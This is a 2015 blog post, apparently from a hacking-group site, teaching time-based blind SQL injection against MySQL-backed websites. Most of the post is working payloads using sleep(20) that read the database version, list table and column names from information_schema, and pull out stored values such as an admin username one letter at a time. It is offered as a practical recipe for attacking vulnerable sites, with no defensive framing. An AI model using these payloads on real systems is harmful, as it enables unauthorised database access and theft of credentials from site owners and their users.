2015-03-19

Blind injection exploitation with simple payloads


Pranaam to all bhai ji _/\_

Today i am going to share simple Blind SQL Injection payload.

These payloads are easy and simple to understand :)

For finding database version
===================
------> If database version is above 5

and (select sleep(20)  from  dual  where( SELECT  version() ) like '5%' )--+
if vulnerable website database version is 5 or above, database will sleep for 20 seconds and page will respond after 20 seconds.

------> if database version is belove 4

and (select sleep(20)  from  dual  where( SELECT  version() ) like '4%' )--+
if vulnerable website database version is 4 or below 5 , page will load after  20 seconds.

For finding Table Name
================
------> Payload is
and (select sleep(20) from dual where 5* (SELECT table_name  FROM information_schema.tables WHERE table_name LIKE 'starting_letters_of_table_name%' LIMIT  0 , 1 )=''  )

ok, in above payload you just need to keep guessing letters in table name and put them in place of  'starting_letters_of_table_name'
for example, website first table name is admin, so i will guess first letter and going to put 'a'.
payload will become like this

and (select sleep(20) from dual where 5* (SELECT table_name  FROM information_schema.tables WHERE table_name LIKE 'a%' LIMIT  0 , 1 )=''  )

if you guessed first letter correctly, page will load after 20 seconds else page will load without any delay.
so now guess next letter, as we will put 'd' along first letter(a) so payload will be like this

and (select sleep(20) from dual where 5* (SELECT table_name  FROM information_schema.tables WHERE table_name LIKE 'ad%' LIMIT  0 , 1 )=''  )

so like this we need to keep guessing and finally we will get whole table name. After that, for next table name extraction, we need to change limit value from 0,1 to 1,1
This is how we will get table name.

For finding Column Name
================
------> Payload is
and (select sleep(20) from dual where 5* (SELECT column_name  FROM information_schema.columns WHERE table_name='our_table_name'  and column_name like 'guess_column_name%' LIMIT  0 , 1 )=''  )

in above payload we are going to extract first column name of defined table(we need to specify), first of all we need to specify table name(replace our_table_name  with table name from which you want to extract column name).
like i got table name 'admin' and now looking for column names inside this table, so i need to replace our_table_name with table name (admin) and then start guessing column name.
lets suppose, column name is 'username' so we will guess first letter and payload

and (select sleep(20) from dual where 5* (SELECT column_name  FROM information_schema.columns WHERE table_name='admin'  and column_name like 'some_letter%' LIMIT  0 , 1 )=''  )

after putting letter will become like this.

and (select sleep(20) from dual where 5* (SELECT column_name  FROM information_schema.columns WHERE table_name='admin'  and column_name like 'u%' LIMIT  0 , 1 )='' )

so if you guessed letter correctly, page will load with 20 second delay.
if you guessed letter correctly, go for next letter and try to guess it :)

at last when we will get column name our payload will be like this

and (select sleep(20) from dual where 5* (SELECT column_name  FROM information_schema.columns WHERE table_name='admin'  and column_name like 'username%' LIMIT  0 , 1 )='' )

page will load with delay of 20 seconds and it will confirm that our first column name is username.
for guessing next column name, change value of limit clause from 0,1 to 1,1 and start guessing column letters.

Getting data from column
=================

Ok once we got table name as well as column name, we will extract data from column.

--------> Payload will be

and (select sleep(20) from dual where (  SELECT our_column_name  FROM our_table_name  LIMIT  0 , 1 ) like 'guessed value%' )

lets suppose, our table name is admin and column name is username , so we need to replace our_column_name with column name 'username' and our_table_name with table name 'admin'
and lets start guessing data value inside column
for example lets assume, username is admin and when we will put letter 'a' in place of  guessed value, page will load with 20 second delay :)

and (select sleep(20) from dual where (  SELECT username  FROM admin  LIMIT  0 , 1 ) like 'a%' )

once you got first letter, guess next letter and when your payload will have combination 'ad' in place of gussed_value, page will load with 20 second delay
like this

and (select sleep(20) from dual where (  SELECT username  FROM admin  LIMIT  0 , 1 ) like 'ad%' )

so we need to keep guessing untill we get complete value and once we will guess complete value of data inside column, page will load with delay of 20 seconds :)

So it was about simple time based blind SQL Injections.
Hope you liked it.
Take care


-==[[Love to]]==--
zero Cool ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,AR AR,Hackuin,Mannu, ViKi, Hardeep singh, Bhuppi,Mohit, Ffe,  RR Mam, Jagriti, DON and bikash dash




Share this post

0 comments

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top